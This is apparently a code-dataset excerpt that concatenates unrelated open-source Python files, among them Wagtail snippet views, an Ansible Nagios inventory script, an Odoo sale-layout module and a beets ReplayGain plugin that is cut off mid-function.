# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
from hueversion import VERSION
setup(
name = "filebrowser",
version = VERSION,
author = "Hue",
url = 'http://github.com/cloudera/hue',
description = "HDFS browser",
packages = find_packages('src'),
package_dir = {'': 'src'},
install_requires = ['setuptools', 'desktop'],
entry_points = { 'desktop.sdk.application': 'filebrowser=filebrowser' },
)
| apache-2.0 |
mixxorz/wagtail | wagtail/snippets/views/snippets.py | 3 | 9927 | from urllib.parse import urlencode
from django.apps import apps
from django.contrib.admin.utils import quote, unquote
from django.core.paginator import Paginator
from django.http import Http404
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
from wagtail.admin import messages
from wagtail.admin.auth import permission_denied
from wagtail.admin.edit_handlers import ObjectList, extract_panel_definitions_from_model_class
from wagtail.admin.forms.search import SearchForm
from wagtail.search.backends import get_search_backend
from wagtail.search.index import class_is_indexed
from wagtail.snippets.models import get_snippet_models
from wagtail.snippets.permissions import get_permission_name, user_can_edit_snippet_type
# == Helper functions ==
def get_snippet_model_from_url_params(app_name, model_name):
"""
Retrieve a model from an app_label / model_name combo.
Raise Http404 if the model is not a valid snippet type.
"""
try:
model = apps.get_model(app_name, model_name)
except LookupError:
raise Http404
if model not in get_snippet_models():
# don't allow people to hack the URL to edit content types that aren't registered as snippets
raise Http404
return model
SNIPPET_EDIT_HANDLERS = {}
def get_snippet_edit_handler(model):
if model not in SNIPPET_EDIT_HANDLERS:
if hasattr(model, 'edit_handler'):
# use the edit handler specified on the page class
edit_handler = model.edit_handler
else:
panels = extract_panel_definitions_from_model_class(model)
edit_handler = ObjectList(panels)
SNIPPET_EDIT_HANDLERS[model] = edit_handler.bind_to(model=model)
return SNIPPET_EDIT_HANDLERS[model]
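# A model can bypass the auto-generated panel list by defining its own
# ``edit_handler``; a minimal sketch (model name and fields are assumptions):
#   class Advert(models.Model):
#       text = models.CharField(max_length=255)
#       edit_handler = ObjectList([FieldPanel('text')])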
# == Views ==
def index(request):
snippet_model_opts = [
model._meta for model in get_snippet_models()
if user_can_edit_snippet_type(request.user, model)]
return render(request, 'wagtailsnippets/snippets/index.html', {
'snippet_model_opts': sorted(
snippet_model_opts, key=lambda x: x.verbose_name.lower())})
def list(request, app_label, model_name):
model = get_snippet_model_from_url_params(app_label, model_name)
permissions = [
get_permission_name(action, model)
for action in ['add', 'change', 'delete']
]
if not any([request.user.has_perm(perm) for perm in permissions]):
return permission_denied(request)
items = model.objects.all()
# Preserve the snippet's model-level ordering if specified, but fall back on PK if not
# (to ensure pagination is consistent)
if not items.ordered:
items = items.order_by('pk')
# Search
is_searchable = class_is_indexed(model)
is_searching = False
search_query = None
if is_searchable and 'q' in request.GET:
search_form = SearchForm(request.GET, placeholder=_("Search %(snippet_type_name)s") % {
'snippet_type_name': model._meta.verbose_name_plural
})
if search_form.is_valid():
search_query = search_form.cleaned_data['q']
search_backend = get_search_backend()
items = search_backend.search(search_query, items)
is_searching = True
else:
search_form = SearchForm(placeholder=_("Search %(snippet_type_name)s") % {
'snippet_type_name': model._meta.verbose_name_plural
})
paginator = Paginator(items, per_page=20)
paginated_items = paginator.get_page(request.GET.get('p'))
# Template
if request.is_ajax():
template = 'wagtailsnippets/snippets/results.html'
else:
template = 'wagtailsnippets/snippets/type_index.html'
return render(request, template, {
'model_opts': model._meta,
'items': paginated_items,
'can_add_snippet': request.user.has_perm(get_permission_name('add', model)),
'can_delete_snippets': request.user.has_perm(get_permission_name('delete', model)),
'is_searchable': is_searchable,
'search_form': search_form,
'is_searching': is_searching,
'query_string': search_query,
})
def create(request, app_label, model_name):
model = get_snippet_model_from_url_params(app_label, model_name)
permission = get_permission_name('add', model)
if not request.user.has_perm(permission):
return permission_denied(request)
instance = model()
edit_handler = get_snippet_edit_handler(model)
edit_handler = edit_handler.bind_to(request=request)
form_class = edit_handler.get_form_class()
if request.method == 'POST':
form = form_class(request.POST, request.FILES, instance=instance)
if form.is_valid():
form.save()
messages.success(
request,
_("%(snippet_type)s '%(instance)s' created.") % {
'snippet_type': capfirst(model._meta.verbose_name),
'instance': instance
},
buttons=[
messages.button(reverse(
'wagtailsnippets:edit', args=(app_label, model_name, quote(instance.pk))
), _('Edit'))
]
)
return redirect('wagtailsnippets:list', app_label, model_name)
else:
messages.validation_error(
request, _("The snippet could not be created due to errors."), form
)
else:
form = form_class(instance=instance)
edit_handler = edit_handler.bind_to(instance=instance, form=form)
return render(request, 'wagtailsnippets/snippets/create.html', {
'model_opts': model._meta,
'edit_handler': edit_handler,
'form': form,
})
def edit(request, app_label, model_name, pk):
model = get_snippet_model_from_url_params(app_label, model_name)
permission = get_permission_name('change', model)
if not request.user.has_perm(permission):
return permission_denied(request)
instance = get_object_or_404(model, pk=unquote(pk))
edit_handler = get_snippet_edit_handler(model)
edit_handler = edit_handler.bind_to(instance=instance, request=request)
form_class = edit_handler.get_form_class()
if request.method == 'POST':
form = form_class(request.POST, request.FILES, instance=instance)
if form.is_valid():
form.save()
messages.success(
request,
_("%(snippet_type)s '%(instance)s' updated.") % {
'snippet_type': capfirst(model._meta.verbose_name),
'instance': instance
},
buttons=[
messages.button(reverse(
'wagtailsnippets:edit', args=(app_label, model_name, quote(instance.pk))
), _('Edit'))
]
)
return redirect('wagtailsnippets:list', app_label, model_name)
else:
messages.validation_error(
request, _("The snippet could not be saved due to errors."), form
)
else:
form = form_class(instance=instance)
edit_handler = edit_handler.bind_to(form=form)
return render(request, 'wagtailsnippets/snippets/edit.html', {
'model_opts': model._meta,
'instance': instance,
'edit_handler': edit_handler,
'form': form,
})
def delete(request, app_label, model_name, pk=None):
model = get_snippet_model_from_url_params(app_label, model_name)
permission = get_permission_name('delete', model)
if not request.user.has_perm(permission):
return permission_denied(request)
if pk:
instances = [get_object_or_404(model, pk=unquote(pk))]
else:
ids = request.GET.getlist('id')
instances = model.objects.filter(pk__in=ids)
count = len(instances)
if request.method == 'POST':
for instance in instances:
instance.delete()
if count == 1:
message_content = _("%(snippet_type)s '%(instance)s' deleted.") % {
'snippet_type': capfirst(model._meta.verbose_name),
'instance': instance
}
else:
# This message is only used in plural form, but we'll define it with ungettext so that
# languages with multiple plural forms can be handled correctly (or, at least, as
# correctly as possible within the limitations of verbose_name_plural...)
message_content = ungettext(
"%(count)d %(snippet_type)s deleted.",
"%(count)d %(snippet_type)s deleted.",
count
) % {
'snippet_type': capfirst(model._meta.verbose_name_plural),
'count': count
}
messages.success(request, message_content)
return redirect('wagtailsnippets:list', app_label, model_name)
return render(request, 'wagtailsnippets/snippets/confirm_delete.html', {
'model_opts': model._meta,
'count': count,
'instances': instances,
'submit_url': (
reverse('wagtailsnippets:delete-multiple', args=(app_label, model_name))
+ '?' + urlencode([('id', instance.pk) for instance in instances])
),
})
def usage(request, app_label, model_name, pk):
model = get_snippet_model_from_url_params(app_label, model_name)
instance = get_object_or_404(model, pk=unquote(pk))
paginator = Paginator(instance.get_usage(), per_page=20)
used_by = paginator.get_page(request.GET.get('p'))
return render(request, "wagtailsnippets/snippets/usage.html", {
'instance': instance,
'used_by': used_by
})
| bsd-3-clause |
BlastarIndia/Blastarix | qemu-1.7.0/scripts/tracetool/backend/ust.py | 74 | 2419 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
LTTng User Space Tracing backend.
"""
__author__ = "Lluís Vilanova <vilanova@ac.upc.edu>"
__copyright__ = "Copyright 2012, Lluís Vilanova <vilanova@ac.upc.edu>"
__license__ = "GPL version 2 or (at your option) any later version"
__maintainer__ = "Stefan Hajnoczi"
__email__ = "stefanha@linux.vnet.ibm.com"
from tracetool import out
PUBLIC = True
def c(events):
out('#include <ust/marker.h>',
'#undef mutex_lock',
'#undef mutex_unlock',
'#undef inline',
'#undef wmb',
'#include "trace.h"')
for e in events:
argnames = ", ".join(e.args.names())
if len(e.args) > 0:
argnames = ', ' + argnames
out('DEFINE_TRACE(ust_%(name)s);',
'',
'static void ust_%(name)s_probe(%(args)s)',
'{',
' trace_mark(ust, %(name)s, %(fmt)s%(argnames)s);',
'}',
name = e.name,
args = e.args,
fmt = e.fmt,
argnames = argnames,
)
else:
out('DEFINE_TRACE(ust_%(name)s);',
'',
'static void ust_%(name)s_probe(%(args)s)',
'{',
' trace_mark(ust, %(name)s, UST_MARKER_NOARGS);',
'}',
name = e.name,
args = e.args,
)
# register probes
out('',
'static void __attribute__((constructor)) trace_init(void)',
'{')
for e in events:
out(' register_trace_ust_%(name)s(ust_%(name)s_probe);',
name = e.name,
)
out('}')
def h(events):
out('#include <ust/tracepoint.h>',
'#undef mutex_lock',
'#undef mutex_unlock',
'#undef inline',
'#undef wmb')
for e in events:
if len(e.args) > 0:
out('DECLARE_TRACE(ust_%(name)s, TP_PROTO(%(args)s), TP_ARGS(%(argnames)s));',
'#define trace_%(name)s trace_ust_%(name)s',
name = e.name,
args = e.args,
argnames = ", ".join(e.args.names()),
)
else:
out('_DECLARE_TRACEPOINT_NOARGS(ust_%(name)s);',
'#define trace_%(name)s trace_ust_%(name)s',
name = e.name,
)
out()
| gpl-3.0 |
stevekuznetsov/ansible | contrib/inventory/nagios_ndo.py | 213 | 3842 | #!/usr/bin/env python
# (c) 2014, Jonathan Lestrelin <jonathan.lestrelin@gmail.com>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
Nagios NDO external inventory script.
========================================
Returns hosts and hostgroups from Nagios NDO.
Configuration is read from `nagios_ndo.ini`.
"""
import os
import argparse
try:
import configparser
except ImportError:
import ConfigParser
configparser = ConfigParser
import json
try:
from sqlalchemy import text
from sqlalchemy.engine import create_engine
except ImportError:
print("Error: SQLAlchemy is needed. Try something like: pip install sqlalchemy")
exit(1)
class NagiosNDOInventory(object):
def read_settings(self):
config = configparser.SafeConfigParser()
config.read(os.path.dirname(os.path.realpath(__file__)) + '/nagios_ndo.ini')
if config.has_option('ndo', 'database_uri'):
self.ndo_database_uri = config.get('ndo', 'database_uri')
def read_cli(self):
parser = argparse.ArgumentParser()
parser.add_argument('--host', nargs=1)
parser.add_argument('--list', action='store_true')
self.options = parser.parse_args()
def get_hosts(self):
engine = create_engine(self.ndo_database_uri)
connection = engine.connect()
select_hosts = text("SELECT display_name \
FROM nagios_hosts")
select_hostgroups = text("SELECT alias \
FROM nagios_hostgroups")
select_hostgroup_hosts = text("SELECT h.display_name \
FROM nagios_hostgroup_members hgm, nagios_hosts h, nagios_hostgroups hg \
WHERE hgm.hostgroup_id = hg.hostgroup_id \
AND hgm.host_object_id = h.host_object_id \
AND hg.alias =:hostgroup_alias")
hosts = connection.execute(select_hosts)
self.result['all']['hosts'] = [host['display_name'] for host in hosts]
for hostgroup in connection.execute(select_hostgroups):
hostgroup_alias = hostgroup['alias']
self.result[hostgroup_alias] = {}
hosts = connection.execute(select_hostgroup_hosts, hostgroup_alias=hostgroup_alias)
self.result[hostgroup_alias]['hosts'] = [host['display_name'] for host in hosts]
def __init__(self):
self.defaultgroup = 'group_all'
self.ndo_database_uri = None
self.options = None
self.read_settings()
self.read_cli()
self.result = {}
self.result['all'] = {}
self.result['all']['hosts'] = []
self.result['_meta'] = {}
self.result['_meta']['hostvars'] = {}
if self.ndo_database_uri:
self.get_hosts()
if self.options.host:
print(json.dumps({}))
elif self.options.list:
print(json.dumps(self.result))
else:
print("usage: --list or --host HOSTNAME")
exit(1)
else:
print("Error: Database configuration is missing. See nagios_ndo.ini.")
exit(1)
NagiosNDOInventory()
| gpl-3.0 |
johnmcdowall/procedural_city_generation | procedural_city_generation/building_generation/getFoundation.py | 3 | 2136 | import numpy as np
from procedural_city_generation.polygons.Polygon2D import Polygon2D, Edge
def getFoundation(poly, grid_width=0.01, eps=10**-8):
rect_area = 0
rect_height = 0
rect_x = [0,0]
rect_base = None
    #Iterate through the edges that border a road and find the largest
    #rectangle for each one
for base in sorted([edge for edge in poly.edges if edge.bordering_road],
key=lambda x: -x.length):
#Initialize height
height = grid_width
done = False
while not done:
cuts = []
for other in poly.edges:
#Find all intersections
if other is not base:
x = [0,0]
try:
x = np.linalg.solve(np.array(((base.dir_vector), (-other.dir_vector))).T,
other[0] - (base[0] + base.n * height))
except np.linalg.LinAlgError:
pass
if eps < x[1] < 1 - eps:
#intersection found
if x[0] < eps:
cuts.append(0)
elif x[0] > 1 - eps:
cuts.append(1)
else:
cuts.append(x[0])
if len(cuts) == 2:
#Possible rectangle found
width = abs(base.length*cuts[1] - base.length*cuts[0])
this_area = width * height
if this_area > rect_area:
rect_area = this_area
rect_height = height
rect_x = cuts
rect_base = base
height += grid_width
else:
done = True
break
if rect_height:
p1 = rect_base[0] + rect_x[1] * rect_base.dir_vector
p2 = rect_base[0] + rect_x[0] * rect_base.dir_vector
p3 = p2 + rect_height * rect_base.n
p4 = p1 + rect_height * rect_base.n
return Polygon2D([p1,p2,p3,p4])
else:
#TODO: assign issue to lenny ... why return false
return False
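# Sketch of the intersection step above (added for exposition, not
# part of the original module): each candidate rectangle's top edge is
# `base` translated by height * base.n. Solving
#
#     base[0] + height * base.n + x[0] * base.dir_vector
#         == other[0] + x[1] * other.dir_vector
#
# for (x[0], x[1]) locates where the translated base line crosses edge
# `other`; x[1] in (0, 1) means a genuine crossing, and x[0] is the
# position of that crossing along the base, clamped to [0, 1].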
if __name__=="__main__":
import matplotlib.pyplot as plt
from plot_poly import plot_poly
from getBlock import getBlock
from getLots import getLots
import construct_polygons as cp
polys, vertices = cp.main()
lots = getLots(polys[:20], vertices)
for poly in lots:
if poly.poly_type == "lot":
f = getFoundation(poly)
if f:
plot_poly(poly, mode="k")
plot_poly(f, mode="g")
else:
plot_poly(poly, mode="r")
plt.show()
| mpl-2.0 |
lightcn/odoo | addons/sale_layout/models/sale_layout.py | 180 | 5037 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv, fields
from itertools import groupby
def grouplines(self, ordered_lines, sortkey):
"""Return lines from a specified invoice or sale order grouped by category"""
grouped_lines = []
for key, valuesiter in groupby(ordered_lines, sortkey):
group = {}
group['category'] = key
group['lines'] = list(v for v in valuesiter)
if 'subtotal' in key and key.subtotal is True:
group['subtotal'] = sum(line.price_subtotal for line in group['lines'])
grouped_lines.append(group)
return grouped_lines
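# Note (illustration only, with plain values rather than ORM records):
# itertools.groupby merges *adjacent* equal keys, so ordered_lines
# must already be sorted by sortkey for the categories to group
# cleanly.
#
#     from itertools import groupby
#     data = sorted(['a1', 'b1', 'a2'], key=lambda s: s[0])
#     groups = [(k, len(list(v))) for k, v in groupby(data, lambda s: s[0])]
#     assert groups == [('a', 2), ('b', 1)]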
class SaleLayoutCategory(osv.Model):
_name = 'sale_layout.category'
_order = 'sequence, id'
_columns = {
'name': fields.char('Name', required=True),
'sequence': fields.integer('Sequence', required=True),
'subtotal': fields.boolean('Add subtotal'),
'separator': fields.boolean('Add separator'),
'pagebreak': fields.boolean('Add pagebreak')
}
_defaults = {
'subtotal': True,
'separator': True,
'pagebreak': False,
'sequence': 10
}
class AccountInvoice(osv.Model):
_inherit = 'account.invoice'
def sale_layout_lines(self, cr, uid, ids, invoice_id=None, context=None):
"""
Returns invoice lines from a specified invoice ordered by
sale_layout_category sequence. Used in sale_layout module.
:Parameters:
-'invoice_id' (int): specify the concerned invoice.
"""
ordered_lines = self.browse(cr, uid, invoice_id, context=context).invoice_line
# We chose to group first by category model and, if not present, by invoice name
sortkey = lambda x: x.sale_layout_cat_id if x.sale_layout_cat_id else ''
return grouplines(self, ordered_lines, sortkey)
import openerp
class AccountInvoiceLine(osv.Model):
_inherit = 'account.invoice.line'
_order = 'invoice_id, categ_sequence, sequence, id'
sale_layout_cat_id = openerp.fields.Many2one('sale_layout.category', string='Section')
categ_sequence = openerp.fields.Integer(related='sale_layout_cat_id.sequence',
string='Layout Sequence', store=True)
_defaults = {
'categ_sequence': 0
}
class SaleOrder(osv.Model):
_inherit = 'sale.order'
def sale_layout_lines(self, cr, uid, ids, order_id=None, context=None):
"""
Returns order lines from a specified sale ordered by
sale_layout_category sequence. Used in sale_layout module.
:Parameters:
-'order_id' (int): specify the concerned sale order.
"""
ordered_lines = self.browse(cr, uid, order_id, context=context).order_line
sortkey = lambda x: x.sale_layout_cat_id if x.sale_layout_cat_id else ''
return grouplines(self, ordered_lines, sortkey)
class SaleOrderLine(osv.Model):
_inherit = 'sale.order.line'
_columns = {
'sale_layout_cat_id': fields.many2one('sale_layout.category',
string='Section'),
'categ_sequence': fields.related('sale_layout_cat_id',
'sequence', type='integer',
string='Layout Sequence', store=True)
# Store is intentionally set in order to keep the "historic" order.
}
_defaults = {
'categ_sequence': 0
}
_order = 'order_id, categ_sequence, sale_layout_cat_id, sequence, id'
def _prepare_order_line_invoice_line(self, cr, uid, line, account_id=False, context=None):
"""Save the layout when converting to an invoice line."""
invoice_vals = super(SaleOrderLine, self)._prepare_order_line_invoice_line(cr, uid, line, account_id=account_id, context=context)
if line.sale_layout_cat_id:
invoice_vals['sale_layout_cat_id'] = line.sale_layout_cat_id.id
if line.categ_sequence:
invoice_vals['categ_sequence'] = line.categ_sequence
return invoice_vals
| agpl-3.0 |
jmwatte/beets | beetsplug/replaygain.py | 2 | 33992 | # This file is part of beets.
# Copyright 2015, Fabrice Laporte, Yevgeny Bezman, and Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import (division, absolute_import, print_function,
unicode_literals)
import subprocess
import os
import collections
import itertools
import sys
import warnings
import re
from beets import logging
from beets import ui
from beets.plugins import BeetsPlugin
from beets.util import syspath, command_output, displayable_path
# Utilities.
class ReplayGainError(Exception):
"""Raised when a local (to a track or an album) error occurs in one
of the backends.
"""
class FatalReplayGainError(Exception):
"""Raised when a fatal error occurs in one of the backends.
"""
def call(args):
"""Execute the command and return its output or raise a
ReplayGainError on failure.
"""
try:
return command_output(args)
except subprocess.CalledProcessError as e:
raise ReplayGainError(
"{0} exited with status {1}".format(args[0], e.returncode)
)
except UnicodeEncodeError:
# Due to a bug in Python 2's subprocess on Windows, Unicode
# filenames can fail to encode on that platform. See:
# http://code.google.com/p/beets/issues/detail?id=499
raise ReplayGainError("argument encoding failed")
# Backend base and plumbing classes.
Gain = collections.namedtuple("Gain", "gain peak")
AlbumGain = collections.namedtuple("AlbumGain", "album_gain track_gains")
class Backend(object):
"""An abstract class representing engine for calculating RG values.
"""
def __init__(self, config, log):
"""Initialize the backend with the configuration view for the
plugin.
"""
self._log = log
def compute_track_gain(self, items):
raise NotImplementedError()
def compute_album_gain(self, album):
# TODO: implement album gain in terms of track gain of the
# individual tracks which can be used for any backend.
raise NotImplementedError()
# bsg1770gain backend
class Bs1770gainBackend(Backend):
"""bs1770gain is a loudness scanner compliant with ITU-R BS.1770 and
its flavors EBU R128, ATSC A/85 and Replaygain 2.0.
"""
def __init__(self, config, log):
super(Bs1770gainBackend, self).__init__(config, log)
config.add({
'chunk_at': 5000,
'method': 'replaygain',
})
self.chunk_at = config['chunk_at'].as_number()
self.method = b'--' + bytes(config['method'].get(unicode))
cmd = b'bs1770gain'
try:
call([cmd, self.method])
self.command = cmd
except OSError:
raise FatalReplayGainError(
'Is bs1770gain installed? Is your method in config correct?'
)
if not self.command:
raise FatalReplayGainError(
'no replaygain command found: install bs1770gain'
)
def compute_track_gain(self, items):
"""Computes the track gain of the given tracks, returns a list
of TrackGain objects.
"""
output = self.compute_gain(items, False)
return output
def compute_album_gain(self, album):
"""Computes the album gain of the given album, returns an
AlbumGain object.
"""
# TODO: What should be done when not all tracks in the album are
# supported?
supported_items = album.items()
output = self.compute_gain(supported_items, True)
if not output:
raise ReplayGainError('no output from bs1770gain')
return AlbumGain(output[-1], output[:-1])
def isplitter(self, items, chunk_at):
"""Break an iterable into chunks of at most size `chunk_at`,
generating lists for each chunk.
"""
iterable = iter(items)
while True:
result = []
for i in range(chunk_at):
try:
a = next(iterable)
except StopIteration:
break
else:
result.append(a)
if result:
yield result
else:
break
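    # Illustration (added for exposition; `backend` stands for any
    # Bs1770gainBackend instance): chunking ten items at chunk_at=4
    # yields three lists.
    #
    #     chunks = list(backend.isplitter(range(10), 4))
    #     assert chunks == [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]]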
def compute_gain(self, items, is_album):
"""Computes the track or album gain of a list of items, returns
a list of TrackGain objects.
When computing album gain, the last TrackGain object returned is
the album gain
"""
if len(items) == 0:
return []
albumgaintot = 0.0
albumpeaktot = 0.0
returnchunks = []
# In the case of very large sets of music, we break the tracks
# into smaller chunks and process them one at a time. This
# avoids running out of memory.
if len(items) > self.chunk_at:
i = 0
for chunk in self.isplitter(items, self.chunk_at):
i += 1
returnchunk = self.compute_chunk_gain(chunk, is_album)
albumgaintot += returnchunk[-1].gain
albumpeaktot += returnchunk[-1].peak
returnchunks = returnchunks + returnchunk[0:-1]
returnchunks.append(Gain(albumgaintot / i, albumpeaktot / i))
return returnchunks
else:
return self.compute_chunk_gain(items, is_album)
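    # Note on the chunked path above (added for exposition): the album
    # gain/peak reported for a chunked run is the arithmetic mean of
    # the per-chunk album values, which trades some accuracy for
    # bounded memory use on very large track sets.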
def compute_chunk_gain(self, items, is_album):
"""Compute ReplayGain values and return a list of results
dictionaries as given by `parse_tool_output`.
"""
# Construct shell command.
cmd = [self.command]
cmd = cmd + [self.method]
cmd = cmd + [b'-it']
# Workaround for Windows: the underlying tool fails on paths
# with the \\?\ prefix, so we don't use it here. This
# prevents the backend from working with long paths.
args = cmd + [syspath(i.path, prefix=False) for i in items]
# Invoke the command.
self._log.debug("executing {0}", " ".join(map(displayable_path, args)))
output = call(args)
self._log.debug(u'analysis finished: {0}', output)
results = self.parse_tool_output(output,
len(items) + is_album)
self._log.debug(u'{0} items, {1} results', len(items), len(results))
return results
def parse_tool_output(self, text, num_lines):
"""Given the output from bs1770gain, parse the text and
return a list of dictionaries
containing information about each analyzed file.
"""
out = []
data = text.decode('utf8', errors='ignore')
regex = re.compile(
ur'(\s{2,2}\[\d+\/\d+\].*?|\[ALBUM\].*?)'
'(?=\s{2,2}\[\d+\/\d+\]|\s{2,2}\[ALBUM\]'
':|done\.\s)', re.DOTALL | re.UNICODE)
results = re.findall(regex, data)
for parts in results[0:num_lines]:
part = parts.split(b'\n')
if len(part) == 0:
self._log.debug('bad tool output: {0!r}', text)
raise ReplayGainError('bs1770gain failed')
try:
song = {
'file': part[0],
'gain': float((part[1].split('/'))[1].split('LU')[0]),
'peak': float(part[2].split('/')[1]),
}
except IndexError:
self._log.info('bs1770gain reports (faulty file?): {}', parts)
continue
out.append(Gain(song['gain'], song['peak']))
return out
# mpgain/aacgain CLI tool backend.
class CommandBackend(Backend):
def __init__(self, config, log):
super(CommandBackend, self).__init__(config, log)
config.add({
'command': u"",
'noclip': True,
})
self.command = config["command"].get(unicode)
if self.command:
# Explicit executable path.
if not os.path.isfile(self.command):
raise FatalReplayGainError(
'replaygain command does not exist: {0}'.format(
self.command
)
)
else:
# Check whether the program is in $PATH.
for cmd in (b'mp3gain', b'aacgain'):
try:
call([cmd, b'-v'])
self.command = cmd
except OSError:
pass
if not self.command:
raise FatalReplayGainError(
'no replaygain command found: install mp3gain or aacgain'
)
self.noclip = config['noclip'].get(bool)
target_level = config['targetlevel'].as_number()
self.gain_offset = int(target_level - 89)
def compute_track_gain(self, items):
"""Computes the track gain of the given tracks, returns a list
of TrackGain objects.
"""
supported_items = filter(self.format_supported, items)
output = self.compute_gain(supported_items, False)
return output
def compute_album_gain(self, album):
"""Computes the album gain of the given album, returns an
AlbumGain object.
"""
# TODO: What should be done when not all tracks in the album are
# supported?
supported_items = filter(self.format_supported, album.items())
if len(supported_items) != len(album.items()):
self._log.debug(u'tracks are of unsupported format')
return AlbumGain(None, [])
output = self.compute_gain(supported_items, True)
return AlbumGain(output[-1], output[:-1])
def format_supported(self, item):
"""Checks whether the given item is supported by the selected tool.
"""
if 'mp3gain' in self.command and item.format != 'MP3':
return False
elif 'aacgain' in self.command and item.format not in ('MP3', 'AAC'):
return False
return True
def compute_gain(self, items, is_album):
"""Computes the track or album gain of a list of items, returns
a list of TrackGain objects.
When computing album gain, the last TrackGain object returned is
the album gain
"""
if len(items) == 0:
self._log.debug('no supported tracks to analyze')
return []
"""Compute ReplayGain values and return a list of results
dictionaries as given by `parse_tool_output`.
"""
# Construct shell command. The "-o" option makes the output
# easily parseable (tab-delimited). "-s s" forces gain
# recalculation even if tags are already present and disables
# tag-writing; this turns the mp3gain/aacgain tool into a gain
# calculator rather than a tag manipulator because we take care
# of changing tags ourselves.
cmd = [self.command, b'-o', b'-s', b's']
if self.noclip:
# Adjust to avoid clipping.
cmd = cmd + [b'-k']
else:
# Disable clipping warning.
cmd = cmd + [b'-c']
cmd = cmd + [b'-d', bytes(self.gain_offset)]
cmd = cmd + [syspath(i.path) for i in items]
self._log.debug(u'analyzing {0} files', len(items))
self._log.debug(u"executing {0}", " ".join(map(displayable_path, cmd)))
output = call(cmd)
self._log.debug(u'analysis finished')
return self.parse_tool_output(output,
len(items) + (1 if is_album else 0))
def parse_tool_output(self, text, num_lines):
"""Given the tab-delimited output from an invocation of mp3gain
or aacgain, parse the text and return a list of dictionaries
containing information about each analyzed file.
"""
out = []
for line in text.split(b'\n')[1:num_lines + 1]:
parts = line.split(b'\t')
if len(parts) != 6 or parts[0] == b'File':
self._log.debug(u'bad tool output: {0}', text)
raise ReplayGainError('mp3gain failed')
d = {
'file': parts[0],
'mp3gain': int(parts[1]),
'gain': float(parts[2]),
'peak': float(parts[3]) / (1 << 15),
'maxgain': int(parts[4]),
'mingain': int(parts[5]),
}
out.append(Gain(d['gain'], d['peak']))
return out
# GStreamer-based backend.
class GStreamerBackend(Backend):
def __init__(self, config, log):
super(GStreamerBackend, self).__init__(config, log)
self._import_gst()
        # Initialize a GStreamer pipeline of the form filesrc ->
        # decodebin -> audioconvert -> audioresample -> rganalysis ->
        # fakesink. The connection between decodebin and audioconvert
        # is handled dynamically after decodebin figures out the type
        # of the input file.
self._src = self.Gst.ElementFactory.make("filesrc", "src")
self._decbin = self.Gst.ElementFactory.make("decodebin", "decbin")
self._conv = self.Gst.ElementFactory.make("audioconvert", "conv")
self._res = self.Gst.ElementFactory.make("audioresample", "res")
self._rg = self.Gst.ElementFactory.make("rganalysis", "rg")
if self._src is None or self._decbin is None or self._conv is None \
or self._res is None or self._rg is None:
raise FatalReplayGainError(
"Failed to load required GStreamer plugins"
)
# We check which files need gain ourselves, so all files given
        # to rganalysis should have their gain computed, even if it
# already exists.
self._rg.set_property("forced", True)
self._rg.set_property("reference-level",
config["targetlevel"].as_number())
self._sink = self.Gst.ElementFactory.make("fakesink", "sink")
self._pipe = self.Gst.Pipeline()
self._pipe.add(self._src)
self._pipe.add(self._decbin)
self._pipe.add(self._conv)
self._pipe.add(self._res)
self._pipe.add(self._rg)
self._pipe.add(self._sink)
self._src.link(self._decbin)
self._conv.link(self._res)
self._res.link(self._rg)
self._rg.link(self._sink)
self._bus = self._pipe.get_bus()
self._bus.add_signal_watch()
self._bus.connect("message::eos", self._on_eos)
self._bus.connect("message::error", self._on_error)
self._bus.connect("message::tag", self._on_tag)
# Needed for handling the dynamic connection between decodebin
# and audioconvert
self._decbin.connect("pad-added", self._on_pad_added)
self._decbin.connect("pad-removed", self._on_pad_removed)
self._main_loop = self.GLib.MainLoop()
self._files = []
def _import_gst(self):
"""Import the necessary GObject-related modules and assign `Gst`
and `GObject` fields on this object.
"""
try:
import gi
except ImportError:
raise FatalReplayGainError(
"Failed to load GStreamer: python-gi not found"
)
try:
gi.require_version('Gst', '1.0')
except ValueError as e:
raise FatalReplayGainError(
"Failed to load GStreamer 1.0: {0}".format(e)
)
from gi.repository import GObject, Gst, GLib
# Calling GObject.threads_init() is not needed for
# PyGObject 3.10.2+
with warnings.catch_warnings():
warnings.simplefilter("ignore")
GObject.threads_init()
Gst.init([sys.argv[0]])
self.GObject = GObject
self.GLib = GLib
self.Gst = Gst
def compute(self, files, album):
self._error = None
self._files = list(files)
if len(self._files) == 0:
return
self._file_tags = collections.defaultdict(dict)
if album:
self._rg.set_property("num-tracks", len(self._files))
if self._set_first_file():
self._main_loop.run()
if self._error is not None:
raise self._error
def compute_track_gain(self, items):
self.compute(items, False)
if len(self._file_tags) != len(items):
raise ReplayGainError("Some tracks did not receive tags")
ret = []
for item in items:
